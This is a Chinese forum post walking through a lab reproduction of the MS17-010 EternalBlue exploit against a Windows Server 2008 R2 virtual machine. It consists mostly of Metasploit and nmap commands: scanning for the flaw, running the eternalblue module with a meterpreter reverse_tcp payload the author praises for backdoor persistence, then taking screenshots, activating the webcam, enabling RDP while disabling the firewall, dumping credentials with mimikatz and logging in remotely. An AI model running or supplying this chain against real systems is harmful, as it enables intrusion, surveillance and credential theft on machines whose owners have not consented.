php ms17-010,PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现

论坛 期权论坛 编程之家     
选择匿名的用户   2021-6-2 16:35   2641   0

猫宁!!!

参考:

“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限,危害极大。

微软的漏洞2个漏洞公告

windows 2008R2镜像从itellme站点获取,种类齐全,比较干净。

e7fed3467dc589ab0ebce7cdadf608ec.png

记得进行新建,建立系统保留分区哦,用于存放系统引导文件,类似于centos7的/boot分区,可以避免系统无法正常启动。

60328d98858c3552d6243fe8f9d0550d.png

虚拟机中的Windows 2008 R2一定要设置为网卡桥接模式

ip是192.168.100.27,先用nmap扫描一下有没有永恒之蓝漏洞存在,扫描脚本在/usr/share/nmap/scripts/

507a519da0f524a0c8e21401d9dfb0ec.png

nmap --script smb-vuln-ms17-010.nse 192.168.100.27,表明开启了445端口,存在漏洞。

f57797e21d76b58ea1b31bacdeda8d24.png

msfconsole,启动MSF

search ms17_010

bf554fc3beb7588e30a8aad2297c7040.png

use auxiliary/scanner/smb/smb_ms17_010,使用POC进行扫描

set RHOST 192.168.100.27

run

证实存在漏洞

f8de27f307ece949dd4f89f9c043ac6c.png

use exploit/windows/smb/ms17_010_eternalblue

set RHOST 192.168.100.27

run

竟然把服务器给打重启了,没有连接上去

1b3bfdad937ef124d11d084c900ff53e.png

b5799c9a085dbfd2bcc1881d73acf709.png

show payloads,看一下更多种类的payload,46个

56ff471aea5d611641c8c9de9bd38fcf.png

show targets,显示适用的目标

a3b33d4ac4d91e440a165dfab51875f1.png

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp,这个payload非常有助于后期的植入后门进行权限维持。

set RHOST 192.168.100.27

run

成功进入服务器系统

412d00ca6a5b57ebbae1f9ddd7162d5c.png

f9adfa258c152d2523f3e0671c458d87.png

screenshot,截屏

07898cc1e9a1131f3327e1bb3641b4ab.png

webcam_scream,可以开启摄像头

run post/windows/manage/enable_rdp,开启远程桌面并关闭防火墙

d7839ef4bd33bc95a9183a88eb2d7aa0.png

c74ae26b845cc718d3d694a569b724c0.png

shell,直接进入系统

8e6ac1645b520cd88be607a7f3cd7e4f.png

load mimikatz,加载密码读取工具

wdigest,成功获取我的密码

be93a7b15fe09e24ef4e01a4f80ce5d4.png

rdesktop 192.168.100.27 -u Administrator -p 111aaabbb!!!

远程连接服务器就好了

arp查看内网情形

b239cf163676e6dcf8ba1bbdc43de3cb.png

获得当前木马进程,getid

d9e574a3930fa335e85bb012eb070e28.png

ps查看

9a99f0d8b89797096704289942e15abf.png

获取用户的身份和权限

91a303332d1b8bc09949de27039f326b.png

判断服务器是不是被人在使用

3335402068f98b36b1156cc4d3c36043.png

run和bgrun,有大量的帮助文件

57b0aa9838ae238ef2dab4820e57395f.png

sysinfo,显示计算机信息

2ae62ab4fed1436b0982399e54455532.png

分享到 :
0 人收藏
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

积分:3875789
帖子:775174
精华:0
期权论坛 期权论坛
发布
内容

下载期权论坛手机APP